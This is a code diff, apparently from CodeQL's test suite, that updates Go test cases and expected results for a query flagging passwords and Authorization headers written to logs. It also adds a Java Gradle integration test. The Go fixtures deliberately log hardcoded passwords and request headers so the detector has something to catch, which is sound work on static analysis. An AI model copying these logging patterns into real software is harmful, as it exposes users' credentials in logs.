main.go:34:10:34:17 | password | $@ flows to a logging call. | main.go:34:10:34:17 | password | Sensitive data returned by an access to password | -| main.go:35:15:35:22 | password | main.go:35:15:35:22 | password | main.go:35:15:35:22 | password | $@ flows to a logging call. | main.go:35:15:35:22 | password | Sensitive data returned by an access to password | -| main.go:36:11:36:18 | password | main.go:36:11:36:18 | password | main.go:36:11:36:18 | password | $@ flows to a logging call. | main.go:36:11:36:18 | password | Sensitive data returned by an access to password | -| main.go:37:12:37:19 | password | main.go:37:12:37:19 | password | main.go:37:12:37:19 | password | $@ flows to a logging call. | main.go:37:12:37:19 | password | Sensitive data returned by an access to password | -| main.go:38:10:38:17 | password | main.go:38:10:38:17 | password | main.go:38:10:38:17 | password | $@ flows to a logging call. | main.go:38:10:38:17 | password | Sensitive data returned by an access to password | -| main.go:39:15:39:22 | password | main.go:39:15:39:22 | password | main.go:39:15:39:22 | password | $@ flows to a logging call. | main.go:39:15:39:22 | password | Sensitive data returned by an access to password | -| main.go:40:11:40:18 | password | main.go:40:11:40:18 | password | main.go:40:11:40:18 | password | $@ flows to a logging call. | main.go:40:11:40:18 | password | Sensitive data returned by an access to password | -| main.go:41:12:41:19 | password | main.go:41:12:41:19 | password | main.go:41:12:41:19 | password | $@ flows to a logging call. | main.go:41:12:41:19 | password | Sensitive data returned by an access to password | -| main.go:42:14:42:21 | password | main.go:42:14:42:21 | password | main.go:42:14:42:21 | password | $@ flows to a logging call. | main.go:42:14:42:21 | password | Sensitive data returned by an access to password | -| main.go:44:12:44:19 | password | main.go:44:12:44:19 | password | main.go:44:12:44:19 | password | $@ flows to a logging call. | main.go:44:12:44:19 | password | Sensitive data returned by an access to password | -| main.go:45:17:45:24 | password | main.go:45:17:45:24 | password | main.go:45:17:45:24 | password | $@ flows to a logging call. | main.go:45:17:45:24 | password | Sensitive data returned by an access to password | -| main.go:52:35:52:42 | password | main.go:52:35:52:42 | password | main.go:52:35:52:42 | password | $@ flows to a logging call. | main.go:52:35:52:42 | password | Sensitive data returned by an access to password | +| klog.go:23:15:23:20 | header | klog.go:21:30:21:37 | selection of Header | klog.go:23:15:23:20 | header | $@ flows to a logging call. | klog.go:21:30:21:37 | selection of Header | Sensitive data returned by HTTP request headers | +| klog.go:29:13:29:41 | call to Get | klog.go:29:13:29:20 | selection of Header | klog.go:29:13:29:41 | call to Get | $@ flows to a logging call. | klog.go:29:13:29:20 | selection of Header | Sensitive data returned by HTTP request headers | +| main.go:16:12:16:19 | password | main.go:16:12:16:19 | password | main.go:16:12:16:19 | password | $@ flows to a logging call. | main.go:16:12:16:19 | password | Sensitive data returned by an access to password | +| main.go:17:19:17:26 | password | main.go:17:19:17:26 | password | main.go:17:19:17:26 | password | $@ flows to a logging call. | main.go:17:19:17:26 | password | Sensitive data returned by an access to password | +| main.go:18:13:18:20 | password | main.go:18:13:18:20 | password | main.go:18:13:18:20 | password | $@ flows to a logging call. | main.go:18:13:18:20 | password | Sensitive data returned by an access to password | +| main.go:19:14:19:21 | password | main.go:19:14:19:21 | password | main.go:19:14:19:21 | password | $@ flows to a logging call. | main.go:19:14:19:21 | password | Sensitive data returned by an access to password | +| main.go:20:12:20:19 | password | main.go:20:12:20:19 | password | main.go:20:12:20:19 | password | $@ flows to a logging call. | main.go:20:12:20:19 | password | Sensitive data returned by an access to password | +| main.go:21:19:21:26 | password | main.go:21:19:21:26 | password | main.go:21:19:21:26 | password | $@ flows to a logging call. | main.go:21:19:21:26 | password | Sensitive data returned by an access to password | +| main.go:22:13:22:20 | password | main.go:22:13:22:20 | password | main.go:22:13:22:20 | password | $@ flows to a logging call. | main.go:22:13:22:20 | password | Sensitive data returned by an access to password | +| main.go:23:14:23:21 | password | main.go:23:14:23:21 | password | main.go:23:14:23:21 | password | $@ flows to a logging call. | main.go:23:14:23:21 | password | Sensitive data returned by an access to password | +| main.go:24:12:24:19 | password | main.go:24:12:24:19 | password | main.go:24:12:24:19 | password | $@ flows to a logging call. | main.go:24:12:24:19 | password | Sensitive data returned by an access to password | +| main.go:25:19:25:26 | password | main.go:25:19:25:26 | password | main.go:25:19:25:26 | password | $@ flows to a logging call. | main.go:25:19:25:26 | password | Sensitive data returned by an access to password | +| main.go:26:13:26:20 | password | main.go:26:13:26:20 | password | main.go:26:13:26:20 | password | $@ flows to a logging call. | main.go:26:13:26:20 | password | Sensitive data returned by an access to password | +| main.go:27:14:27:21 | password | main.go:27:14:27:21 | password | main.go:27:14:27:21 | password | $@ flows to a logging call. | main.go:27:14:27:21 | password | Sensitive data returned by an access to password | +| main.go:28:16:28:23 | password | main.go:28:16:28:23 | password | main.go:28:16:28:23 | password | $@ flows to a logging call. | main.go:28:16:28:23 | password | Sensitive data returned by an access to password | +| main.go:32:10:32:17 | password | main.go:32:10:32:17 | password | main.go:32:10:32:17 | password | $@ flows to a logging call. | main.go:32:10:32:17 | password | Sensitive data returned by an access to password | +| main.go:33:17:33:24 | password | main.go:33:17:33:24 | password | main.go:33:17:33:24 | password | $@ flows to a logging call. | main.go:33:17:33:24 | password | Sensitive data returned by an access to password | +| main.go:34:11:34:18 | password | main.go:34:11:34:18 | password | main.go:34:11:34:18 | password | $@ flows to a logging call. | main.go:34:11:34:18 | password | Sensitive data returned by an access to password | +| main.go:35:12:35:19 | password | main.go:35:12:35:19 | password | main.go:35:12:35:19 | password | $@ flows to a logging call. | main.go:35:12:35:19 | password | Sensitive data returned by an access to password | +| main.go:36:10:36:17 | password | main.go:36:10:36:17 | password | main.go:36:10:36:17 | password | $@ flows to a logging call. | main.go:36:10:36:17 | password | Sensitive data returned by an access to password | +| main.go:37:17:37:24 | password | main.go:37:17:37:24 | password | main.go:37:17:37:24 | password | $@ flows to a logging call. | main.go:37:17:37:24 | password | Sensitive data returned by an access to password | +| main.go:38:11:38:18 | password | main.go:38:11:38:18 | password | main.go:38:11:38:18 | password | $@ flows to a logging call. | main.go:38:11:38:18 | password | Sensitive data returned by an access to password | +| main.go:39:12:39:19 | password | main.go:39:12:39:19 | password | main.go:39:12:39:19 | password | $@ flows to a logging call. | main.go:39:12:39:19 | password | Sensitive data returned by an access to password | +| main.go:40:10:40:17 | password | main.go:40:10:40:17 | password | main.go:40:10:40:17 | password | $@ flows to a logging call. | main.go:40:10:40:17 | password | Sensitive data returned by an access to password | +| main.go:41:17:41:24 | password | main.go:41:17:41:24 | password | main.go:41:17:41:24 | password | $@ flows to a logging call. | main.go:41:17:41:24 | password | Sensitive data returned by an access to password | +| main.go:42:11:42:18 | password | main.go:42:11:42:18 | password | main.go:42:11:42:18 | password | $@ flows to a logging call. | main.go:42:11:42:18 | password | Sensitive data returned by an access to password | +| main.go:43:12:43:19 | password | main.go:43:12:43:19 | password | main.go:43:12:43:19 | password | $@ flows to a logging call. | main.go:43:12:43:19 | password | Sensitive data returned by an access to password | +| main.go:44:14:44:21 | password | main.go:44:14:44:21 | password | main.go:44:14:44:21 | password | $@ flows to a logging call. | main.go:44:14:44:21 | password | Sensitive data returned by an access to password | +| main.go:47:12:47:19 | password | main.go:47:12:47:19 | password | main.go:47:12:47:19 | password | $@ flows to a logging call. | main.go:47:12:47:19 | password | Sensitive data returned by an access to password | +| main.go:48:17:48:24 | password | main.go:48:17:48:24 | password | main.go:48:17:48:24 | password | $@ flows to a logging call. | main.go:48:17:48:24 | password | Sensitive data returned by an access to password | +| main.go:55:35:55:42 | password | main.go:55:35:55:42 | password | main.go:55:35:55:42 | password | $@ flows to a logging call. | main.go:55:35:55:42 | password | Sensitive data returned by an access to password | | overrides.go:13:14:13:23 | call to String | overrides.go:9:9:9:16 | password | overrides.go:13:14:13:23 | call to String | $@ flows to a logging call. | overrides.go:9:9:9:16 | password | Sensitive data returned by an access to password | | passwords.go:9:14:9:14 | x | passwords.go:30:8:30:15 | password | passwords.go:9:14:9:14 | x | $@ flows to a logging call. | passwords.go:30:8:30:15 | password | Sensitive data returned by an access to password | | passwords.go:25:14:25:21 | password | passwords.go:25:14:25:21 | password | passwords.go:25:14:25:21 | password | $@ flows to a logging call. | passwords.go:25:14:25:21 | password | Sensitive data returned by an access to password | @@ -55,11 +55,11 @@ | passwords.go:127:14:127:21 | selection of y | passwords.go:122:13:122:25 | call to getPassword | passwords.go:127:14:127:21 | selection of y | $@ flows to a logging call. | passwords.go:122:13:122:25 | call to getPassword | Sensitive data returned by a call to getPassword | | protobuf.go:14:14:14:35 | call to GetDescription | protobuf.go:12:22:12:29 | password | protobuf.go:14:14:14:35 | call to GetDescription | $@ flows to a logging call. | protobuf.go:12:22:12:29 | password | Sensitive data returned by an access to password | edges -| klog.go:20:3:25:3 | range statement[1] | klog.go:21:27:21:33 | headers | provenance | | -| klog.go:20:30:20:37 | selection of Header | klog.go:20:3:25:3 | range statement[1] | provenance | Src:MaD:1 Config | -| klog.go:21:4:24:4 | range statement[1] | klog.go:22:15:22:20 | header | provenance | | -| klog.go:21:27:21:33 | headers | klog.go:21:4:24:4 | range statement[1] | provenance | Config | -| klog.go:28:13:28:20 | selection of Header | klog.go:28:13:28:41 | call to Get | provenance | Src:MaD:1 Config | +| klog.go:21:3:26:3 | range statement[1] | klog.go:22:27:22:33 | headers | provenance | | +| klog.go:21:30:21:37 | selection of Header | klog.go:21:3:26:3 | range statement[1] | provenance | Src:MaD:1 Config | +| klog.go:22:4:25:4 | range statement[1] | klog.go:23:15:23:20 | header | provenance | | +| klog.go:22:27:22:33 | headers | klog.go:22:4:25:4 | range statement[1] | provenance | Config | +| klog.go:29:13:29:20 | selection of Header | klog.go:29:13:29:41 | call to Get | provenance | Src:MaD:1 Config | | overrides.go:9:9:9:16 | password | overrides.go:13:14:13:23 | call to String | provenance | | | passwords.go:8:12:8:12 | definition of x | passwords.go:9:14:9:14 | x | provenance | | | passwords.go:30:8:30:15 | password | passwords.go:8:12:8:12 | definition of x | provenance | | @@ -101,42 +101,42 @@ edges models | 1 | Source: net/http; Request; true; Header; ; ; ; remote; manual | nodes -| klog.go:20:3:25:3 | range statement[1] | semmle.label | range statement[1] | -| klog.go:20:30:20:37 | selection of Header | semmle.label | selection of Header | -| klog.go:21:4:24:4 | range statement[1] | semmle.label | range statement[1] | -| klog.go:21:27:21:33 | headers | semmle.label | headers | -| klog.go:22:15:22:20 | header | semmle.label | header | -| klog.go:28:13:28:20 | selection of Header | semmle.label | selection of Header | -| klog.go:28:13:28:41 | call to Get | semmle.label | call to Get | -| main.go:15:12:15:19 | password | semmle.label | password | -| main.go:16:17:16:24 | password | semmle.label | password | -| main.go:17:13:17:20 | password | semmle.label | password | -| main.go:18:14:18:21 | password | semmle.label | password | -| main.go:19:12:19:19 | password | semmle.label | password | -| main.go:20:17:20:24 | password | semmle.label | password | -| main.go:21:13:21:20 | password | semmle.label | password | -| main.go:22:14:22:21 | password | semmle.label | password | -| main.go:23:12:23:19 | password | semmle.label | password | -| main.go:24:17:24:24 | password | semmle.label | password | -| main.go:25:13:25:20 | password | semmle.label | password | -| main.go:26:14:26:21 | password | semmle.label | password | -| main.go:27:16:27:23 | password | semmle.label | password | -| main.go:30:10:30:17 | password | semmle.label | password | -| main.go:31:15:31:22 | password | semmle.label | password | -| main.go:32:11:32:18 | password | semmle.label | password | -| main.go:33:12:33:19 | password | semmle.label | password | -| main.go:34:10:34:17 | password | semmle.label | password | -| main.go:35:15:35:22 | password | semmle.label | password | -| main.go:36:11:36:18 | password | semmle.label | password | -| main.go:37:12:37:19 | password | semmle.label | password | -| main.go:38:10:38:17 | password | semmle.label | password | -| main.go:39:15:39:22 | password | semmle.label | password | -| main.go:40:11:40:18 | password | semmle.label | password | -| main.go:41:12:41:19 | password | semmle.label | password | -| main.go:42:14:42:21 | password | semmle.label | password | -| main.go:44:12:44:19 | password | semmle.label | password | -| main.go:45:17:45:24 | password | semmle.label | password | -| main.go:52:35:52:42 | password | semmle.label | password | +| klog.go:21:3:26:3 | range statement[1] | semmle.label | range statement[1] | +| klog.go:21:30:21:37 | selection of Header | semmle.label | selection of Header | +| klog.go:22:4:25:4 | range statement[1] | semmle.label | range statement[1] | +| klog.go:22:27:22:33 | headers | semmle.label | headers | +| klog.go:23:15:23:20 | header | semmle.label | header | +| klog.go:29:13:29:20 | selection of Header | semmle.label | selection of Header | +| klog.go:29:13:29:41 | call to Get | semmle.label | call to Get | +| main.go:16:12:16:19 | password | semmle.label | password | +| main.go:17:19:17:26 | password | semmle.label | password | +| main.go:18:13:18:20 | password | semmle.label | password | +| main.go:19:14:19:21 | password | semmle.label | password | +| main.go:20:12:20:19 | password | semmle.label | password | +| main.go:21:19:21:26 | password | semmle.label | password | +| main.go:22:13:22:20 | password | semmle.label | password | +| main.go:23:14:23:21 | password | semmle.label | password | +| main.go:24:12:24:19 | password | semmle.label | password | +| main.go:25:19:25:26 | password | semmle.label | password | +| main.go:26:13:26:20 | password | semmle.label | password | +| main.go:27:14:27:21 | password | semmle.label | password | +| main.go:28:16:28:23 | password | semmle.label | password | +| main.go:32:10:32:17 | password | semmle.label | password | +| main.go:33:17:33:24 | password | semmle.label | password | +| main.go:34:11:34:18 | password | semmle.label | password | +| main.go:35:12:35:19 | password | semmle.label | password | +| main.go:36:10:36:17 | password | semmle.label | password | +| main.go:37:17:37:24 | password | semmle.label | password | +| main.go:38:11:38:18 | password | semmle.label | password | +| main.go:39:12:39:19 | password | semmle.label | password | +| main.go:40:10:40:17 | password | semmle.label | password | +| main.go:41:17:41:24 | password | semmle.label | password | +| main.go:42:11:42:18 | password | semmle.label | password | +| main.go:43:12:43:19 | password | semmle.label | password | +| main.go:44:14:44:21 | password | semmle.label | password | +| main.go:47:12:47:19 | password | semmle.label | password | +| main.go:48:17:48:24 | password | semmle.label | password | +| main.go:55:35:55:42 | password | semmle.label | password | | overrides.go:9:9:9:16 | password | semmle.label | password | | overrides.go:13:14:13:23 | call to String | semmle.label | call to String | | passwords.go:8:12:8:12 | definition of x | semmle.label | definition of x | diff --git a/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.qlref b/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.qlref index b540e0ddc002..693299c33a21 100644 --- a/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.qlref +++ b/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.qlref @@ -1,2 +1,4 @@ query: Security/CWE-312/CleartextLogging.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/go/ql/test/query-tests/Security/CWE-312/klog.go b/go/ql/test/query-tests/Security/CWE-312/klog.go index 70265c7d4719..126dc65b6966 100644 --- a/go/ql/test/query-tests/Security/CWE-312/klog.go +++ b/go/ql/test/query-tests/Security/CWE-312/klog.go @@ -3,9 +3,10 @@ package main //go:generate depstubber -vendor k8s.io/klog "" Info import ( - "k8s.io/klog" "net/http" "strings" + + "k8s.io/klog" ) func mask(key, value string) string { @@ -17,15 +18,15 @@ func mask(key, value string) string { func klogTest() { http.HandleFunc("/klog", func(w http.ResponseWriter, r *http.Request) { - for name, headers := range r.Header { + for name, headers := range r.Header { // $ Source for _, header := range headers { - klog.Info(header) // NOT OK + klog.Info(header) // $ Alert klog.Info(mask(name, header)) // OK } } klog.Info(r.Header.Get("Accept")) // OK klog.Info(r.Header["Content-Type"]) // OK - klog.Info(r.Header.Get("Authorization")) // NOT OK + klog.Info(r.Header.Get("Authorization")) // $ Alert }) http.ListenAndServe(":80", nil) } diff --git a/go/ql/test/query-tests/Security/CWE-312/main.go b/go/ql/test/query-tests/Security/CWE-312/main.go index d91166455571..17a183ff2096 100644 --- a/go/ql/test/query-tests/Security/CWE-312/main.go +++ b/go/ql/test/query-tests/Security/CWE-312/main.go @@ -4,51 +4,54 @@ package main //go:generate depstubber -vendor github.com/golang/glog "" Info import ( + "log" + "github.com/golang/glog" "github.com/sirupsen/logrus" - "log" ) func main() { password := "P4ssw0rd" - log.Print(password) - log.Printf("", password) - log.Printf(password, "") - log.Println(password) - log.Fatal(password) - log.Fatalf("", password) - log.Fatalf(password, "") - log.Fatalln(password) - log.Panic(password) - log.Panicf("", password) - log.Panicf(password, "") - log.Panicln(password) - log.Output(0, password) + log.Print(password) // $ Alert + log.Printf("%s", password) // $ Alert + log.Printf(password, "") // $ Alert + log.Println(password) // $ Alert + log.Fatal(password) // $ Alert + log.Fatalf("%s", password) // $ Alert + log.Fatalf(password, "") // $ Alert + log.Fatalln(password) // $ Alert + log.Panic(password) // $ Alert + log.Panicf("%s", password) // $ Alert + log.Panicf(password, "") // $ Alert + log.Panicln(password) // $ Alert + log.Output(0, password) // $ Alert + log.Printf("%T", password) l := log.Default() - l.Print(password) - l.Printf("", password) - l.Printf(password, "") - l.Println(password) - l.Fatal(password) - l.Fatalf("", password) - l.Fatalf(password, "") - l.Fatalln(password) - l.Panic(password) - l.Panicf("", password) - l.Panicf(password, "") - l.Panicln(password) - l.Output(0, password) - - glog.Info(password) - logrus.Warning(password) + l.Print(password) // $ Alert + l.Printf("%s", password) // $ Alert + l.Printf(password, "") // $ Alert + l.Println(password) // $ Alert + l.Fatal(password) // $ Alert + l.Fatalf("%s", password) // $ Alert + l.Fatalf(password, "") // $ Alert + l.Fatalln(password) // $ Alert + l.Panic(password) // $ Alert + l.Panicf("%s", password) // $ Alert + l.Panicf(password, "") // $ Alert + l.Panicln(password) // $ Alert + l.Output(0, password) // $ Alert + l.Printf("%T", password) + + glog.Info(password) // $ Alert + logrus.Warning(password) // $ Alert fields := make(logrus.Fields) fields["pass"] = password entry := logrus.WithFields(fields) entry.Errorf("") - entry = logrus.WithField("pass", password) + entry = logrus.WithField("pass", password) // $ Alert entry.Panic("") } diff --git a/go/ql/test/query-tests/Security/CWE-312/overrides.go b/go/ql/test/query-tests/Security/CWE-312/overrides.go index cd94b1b84b54..98fbdad9e77d 100644 --- a/go/ql/test/query-tests/Security/CWE-312/overrides.go +++ b/go/ql/test/query-tests/Security/CWE-312/overrides.go @@ -6,10 +6,10 @@ type s struct{} func (_ s) String() string { password := "horsebatterystaplecorrect" - return password + return password // $ Source } func overrideTest(x s, y fmt.Stringer) { - fmt.Println(x.String()) // NOT OK + fmt.Println(x.String()) // $ Alert fmt.Println(y.String()) // OK } diff --git a/go/ql/test/query-tests/Security/CWE-312/passwords.go b/go/ql/test/query-tests/Security/CWE-312/passwords.go index 5f0b291016db..f99178f0fae0 100644 --- a/go/ql/test/query-tests/Security/CWE-312/passwords.go +++ b/go/ql/test/query-tests/Security/CWE-312/passwords.go @@ -6,7 +6,7 @@ import ( ) func myLog(x string) { - log.Println(x) // NOT OK + log.Println(x) // $ Alert } func redact(kind, value string) string { @@ -22,33 +22,33 @@ func test() { x := "horsebatterystapleincorrect" var o passStruct - log.Println(password) // NOT OK - log.Println(o.password) // NOT OK - log.Println(getPassword()) // NOT OK - log.Println(o.getPassword()) // NOT OK + log.Println(password) // $ Alert + log.Println(o.password) // $ Alert + log.Println(getPassword()) // $ Alert + log.Println(o.getPassword()) // $ Alert - myLog(password) + myLog(password) // $ Source - log.Panic(password) // NOT OK + log.Panic(password) // $ Alert - log.Println(name + ", " + password) // NOT OK + log.Println(name + ", " + password) // $ Alert obj1 := passStruct{ - password: x, + password: x, // $ Source } - log.Println(obj1) // NOT OK + log.Println(obj1) // $ Alert obj2 := xStruct{ - x: password, + x: password, // $ Source } - log.Println(obj2) // NOT OK + log.Println(obj2) // $ Alert var obj3 xStruct - log.Println(obj3) // caught because of the below line - obj3.x = password // NOT OK + log.Println(obj3) // $ SPURIOUS: Alert // caught because of the below line and def-use flow + obj3.x = password // $ Source fixed_password := "cowbatterystaplecorrect" - log.Println(fixed_password) // Probably OK, but caught + log.Println(fixed_password) // $ Alert // Probably OK log.Println(IncorrectPasswordError) // OK @@ -83,12 +83,12 @@ func test() { log.Println(password_sha) // OK utilityObject := passSetStruct{ - passwordSet: make(map[string]bool), + passwordSet: make(map[string]bool), // $ Source } - log.Println(utilityObject) // NOT OK + log.Println(utilityObject) // $ Alert - secret := password - log.Printf("pw: %s", secret) // NOT OK + secret := password // $ Source + log.Printf("pw: %s", secret) // $ Alert log.Println("Password is: " + redact("password", password)) @@ -98,33 +98,33 @@ func test() { if t.test(y) { f() // ... - log.Println("Password is: " + password) // NOT OK + log.Println("Password is: " + password) // $ Alert // ... } if t.test(y) { if f() { - log.Println("Password is: " + password) // NOT OK + log.Println("Password is: " + password) // $ Alert } } if os.Getenv("APP_ENV") != "production" { - log.Println("Password is: " + password) // OK, but still flagged + log.Println("Password is: " + password) // $ SPURIOUS: Alert } var password1 stringable = stringable{"arstneio"} - log.Println(name + ", " + password1.String()) // NOT OK + log.Println(name + ", " + password1.String()) // $ Alert config := Config{ - password: x, + password: x, // $ Source hostname: "tarski", - x: password, - y: getPassword(), + x: password, // $ Source + y: getPassword(), // $ Source } log.Println(config.hostname) // OK - log.Println(config) // NOT OK - log.Println(config.x) // NOT OK - log.Println(config.y) // NOT OK + log.Println(config) // $ Alert + log.Println(config.x) // $ Alert + log.Println(config.y) // $ Alert obj4 := xStruct{ x: "aaaaa", diff --git a/go/ql/test/query-tests/Security/CWE-312/protobuf.go b/go/ql/test/query-tests/Security/CWE-312/protobuf.go index ce8e2218842b..a995f0d7cb8b 100644 --- a/go/ql/test/query-tests/Security/CWE-312/protobuf.go +++ b/go/ql/test/query-tests/Security/CWE-312/protobuf.go @@ -9,8 +9,8 @@ func testProtobuf() { password := "P@ssw0rd" query := &query.Query{} - query.Description = password + query.Description = password // $ Source - log.Println(query.GetDescription()) // NOT OK + log.Println(query.GetDescription()) // $ Alert log.Println(query.GetId()) // OK } diff --git a/java/ql/consistency-queries/SsaConsistency.ql b/java/ql/consistency-queries/SsaConsistency.ql new file mode 100644 index 000000000000..b62db63ac5ba --- /dev/null +++ b/java/ql/consistency-queries/SsaConsistency.ql @@ -0,0 +1,3 @@ +import java +import semmle.code.java.dataflow.internal.SsaImpl +import Impl::Consistency diff --git a/java/ql/integration-tests/java/buildless-gradle-boms/build.gradle b/java/ql/integration-tests/java/buildless-gradle-boms/build.gradle new file mode 100644 index 000000000000..c70d65bed806 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-gradle-boms/build.gradle @@ -0,0 +1,18 @@ +/* + * This file was generated by the Gradle 'init' task. + * + * This is a general purpose Gradle build. + * To learn more about Gradle by exploring our Samples at https://docs.gradle.org/8.3/samples + */ + +apply plugin: 'java-library' + +repositories { + mavenCentral() +} + +dependencies { + api 'org.apache.commons:commons-math3:3.6.1' + + api 'org.junit.jupiter:junit-jupiter-api:5.12.1' +} diff --git a/java/ql/integration-tests/java/buildless-gradle-boms/buildless-fetches.expected b/java/ql/integration-tests/java/buildless-gradle-boms/buildless-fetches.expected new file mode 100644 index 000000000000..7b336ba62cb6 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-gradle-boms/buildless-fetches.expected @@ -0,0 +1,5 @@ +https://repo.maven.apache.org/maven2/org/apache/commons/commons-math3/3.6.1/commons-math3-3.6.1.jar +https://repo.maven.apache.org/maven2/org/apiguardian/apiguardian-api/1.1.2/apiguardian-api-1.1.2.jar +https://repo.maven.apache.org/maven2/org/junit/jupiter/junit-jupiter-api/5.12.1/junit-jupiter-api-5.12.1.jar +https://repo.maven.apache.org/maven2/org/junit/platform/junit-platform-commons/1.12.1/junit-platform-commons-1.12.1.jar +https://repo.maven.apache.org/maven2/org/opentest4j/opentest4j/1.3.0/opentest4j-1.3.0.jar diff --git a/java/ql/integration-tests/java/buildless-gradle-boms/diagnostics.expected b/java/ql/integration-tests/java/buildless-gradle-boms/diagnostics.expected new file mode 100644 index 000000000000..976e0eb08fce --- /dev/null +++ b/java/ql/integration-tests/java/buildless-gradle-boms/diagnostics.expected @@ -0,0 +1,70 @@ +{ + "markdownMessage": "Java analysis used build tool Gradle to pick a JDK version and/or to recommend external dependencies.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/using-build-tool-advice", + "name": "Java analysis used build tool Gradle to pick a JDK version and/or to recommend external dependencies" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java analysis used the system default JDK.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/jdk-system-default", + "name": "Java analysis used the system default JDK" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java analysis with build-mode 'none' completed.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/complete", + "name": "Java analysis with build-mode 'none' completed" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java was extracted with build-mode set to 'none'. This means that all Java source in the working directory will be scanned, with build tools such as Maven and Gradle only contributing information about external dependencies.", + "severity": "note", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/mode-active", + "name": "Java was extracted with build-mode set to 'none'" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": true, + "telemetry": true + } +} +{ + "markdownMessage": "Reading the dependency graph from build files provided 5 classpath entries", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/depgraph-provided-by-gradle", + "name": "Java analysis extracted precise dependency graph information from tool Gradle" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} diff --git a/java/ql/integration-tests/java/buildless-gradle-boms/settings.gradle b/java/ql/integration-tests/java/buildless-gradle-boms/settings.gradle new file mode 100644 index 000000000000..227c1aae87a1 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-gradle-boms/settings.gradle @@ -0,0 +1,8 @@ +/* + * This file was generated by the Gradle 'init' task. + * + * The settings file is used to specify which projects to include in your build. + * For more detailed information on multi-project builds, please refer to https://docs.gradle.org/8.3/userguide/building_swift_projects.html in the Gradle documentation. + */ + +rootProject.name = 'buildless-gradle' diff --git a/java/ql/integration-tests/java/buildless-gradle-boms/source_archive.expected b/java/ql/integration-tests/java/buildless-gradle-boms/source_archive.expected new file mode 100644 index 000000000000..82828506b8ae --- /dev/null +++ b/java/ql/integration-tests/java/buildless-gradle-boms/source_archive.expected @@ -0,0 +1,6 @@ +.gradle/8.3/dependencies-accessors/gc.properties +.gradle/8.3/gc.properties +.gradle/buildOutputCleanup/cache.properties +.gradle/vcs-1/gc.properties +gradle/wrapper/gradle-wrapper.properties +src/main/java/com/fractestexample/Test.java diff --git a/java/ql/integration-tests/java/buildless-gradle-boms/src/main/java/com/fractestexample/Test.java b/java/ql/integration-tests/java/buildless-gradle-boms/src/main/java/com/fractestexample/Test.java new file mode 100644 index 000000000000..b8dc610a62e1 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-gradle-boms/src/main/java/com/fractestexample/Test.java @@ -0,0 +1,9 @@ +package com.fractestexample; + +import org.apache.commons.math3.fraction.Fraction; + +public class Test { + + public Fraction test(org.junit.jupiter.api.Test t) { return Fraction.ONE; } + +} diff --git a/java/ql/integration-tests/java/buildless-gradle-boms/test.py b/java/ql/integration-tests/java/buildless-gradle-boms/test.py new file mode 100644 index 000000000000..bea3e5f552c0 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-gradle-boms/test.py @@ -0,0 +1,7 @@ +def test(codeql, java, gradle_8_3): + codeql.database.create( + _env={ + "CODEQL_EXTRACTOR_JAVA_OPTION_BUILDLESS": "true", + "CODEQL_EXTRACTOR_JAVA_OPTION_BUILDLESS_CLASSPATH_FROM_BUILD_FILES": "true", + } + ) diff --git a/java/ql/integration-tests/java/buildless-inherit-trust-store/server.py b/java/ql/integration-tests/java/buildless-inherit-trust-store/server.py index 60b3f408a05d..33d0fdb2672a 100644 --- a/java/ql/integration-tests/java/buildless-inherit-trust-store/server.py +++ b/java/ql/integration-tests/java/buildless-inherit-trust-store/server.py @@ -4,7 +4,8 @@ httpd = HTTPServer(('localhost', 4443), SimpleHTTPRequestHandler) -sslctx = ssl.SSLContext() +sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) +sslctx.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 sslctx.load_cert_chain(certfile="../cert.pem", keyfile="../key.pem") httpd.socket = sslctx.wrap_socket (httpd.socket, server_side=True) diff --git a/java/ql/integration-tests/java/buildless-maven-mirrorof/buildless-fetches.expected b/java/ql/integration-tests/java/buildless-maven-mirrorof/buildless-fetches.expected new file mode 100644 index 000000000000..e3710cc4cb93 --- /dev/null +++ b/java/ql/integration-tests/java/buildless-maven-mirrorof/buildless-fetches.expected @@ -0,0 +1,26 @@ +https://repo.maven.apache.org/maven2/com/feiniaojin/naaf/naaf-graceful-response-example/1.0/naaf-graceful-response-example-1.0.jar +https://repo.maven.apache.org/maven2/com/github/MoebiusSolutions/avro-registry-in-source/avro-registry-in-source-tests/1.8/avro-registry-in-source-tests-1.8.jar +https://repo.maven.apache.org/maven2/com/github/MoebiusSolutions/avro-registry-in-source/example-project/1.5/example-project-1.5.jar +https://repo.maven.apache.org/maven2/com/intuit/benten/benten-examples/0.1.5/benten-examples-0.1.5.jar +https://repo.maven.apache.org/maven2/com/jakewharton/twirl/sample-runtime/1.2.0/sample-runtime-1.2.0.jar +https://repo.maven.apache.org/maven2/com/mattunderscore/code/generation/specky/plugin-example/0.8.0/plugin-example-0.8.0.jar +https://repo.maven.apache.org/maven2/com/microsoft/tang/tang-test-jarAB/0.9/tang-test-jarAB-0.9.jar +https://repo.maven.apache.org/maven2/de/knutwalker/rx-redis-example_2.11/0.1.2/rx-redis-example_2.11-0.1.2.jar +https://repo.maven.apache.org/maven2/de/knutwalker/rx-redis-java-example_2.11/0.1.2/rx-redis-java-example_2.11-0.1.2.jar 